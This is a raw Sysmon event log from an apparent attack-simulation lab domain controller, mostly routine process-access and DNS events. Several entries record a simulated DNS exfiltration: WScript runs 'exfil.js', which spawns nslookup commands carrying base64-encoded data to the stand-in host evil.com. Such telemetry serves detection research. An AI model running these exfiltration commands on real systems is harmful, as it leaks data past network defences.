354300x8000000000000000203212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.151{00000000-0000-0000-0000-000000000000}7560<unknown process>-udptruefalse127.0.0.1-52969-false127.0.0.1-53domain 354300x8000000000000000203211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.151{00000000-0000-0000-0000-000000000000}7560<unknown process>-udpfalsefalse127.0.0.1-52968-false127.0.0.1-53domain 354300x8000000000000000203210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.151{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52968- 10341000x8000000000000000203209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.150{00000000-0000-0000-0000-000000000000}7560<unknown process>-udptruefalse127.0.0.1-52968-false127.0.0.1-53domain 354300x8000000000000000203207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.026{00000000-0000-0000-0000-000000000000}5896<unknown process>-udpfalsefalse127.0.0.1-52967-false127.0.0.1-53domain 10341000x8000000000000000203206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9641-000000005F02}2668C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.495{2E1864BB-17C9-629A-9441-000000005F02}61486656C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-9641-000000005F02}2668C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.497{2E1864BB-17C9-629A-9641-000000005F02}2668C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-9441-000000005F02}6148C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvznpc.tmp 2>&1 10341000x8000000000000000203200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.480{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9541-000000005F02}2516C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.480{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9541-000000005F02}2516C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.464{2E1864BB-17C9-629A-9541-000000005F02}25164248C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9441-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9541-000000005F02}2516C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9441-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.448{2E1864BB-17A1-629A-783D-000000005F02}55521352C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-9441-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.447{2E1864BB-17C9-629A-9441-000000005F02}6148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvznpc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.410{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqklxq.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-17C9-629A-9241-000000005F02}25122672C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9341-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9341-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-17C9-629A-9141-000000005F02}70362536C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-9341-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.378{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.382{2E1864BB-17C9-629A-9341-000000005F02}5060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-9141-000000005F02}7036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqklxq.tmp 2>&1 10341000x8000000000000000203180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.344{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9241-000000005F02}2512C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.344{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9241-000000005F02}2512C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.325{2E1864BB-17C9-629A-9241-000000005F02}25122672C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9141-000000005F02}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 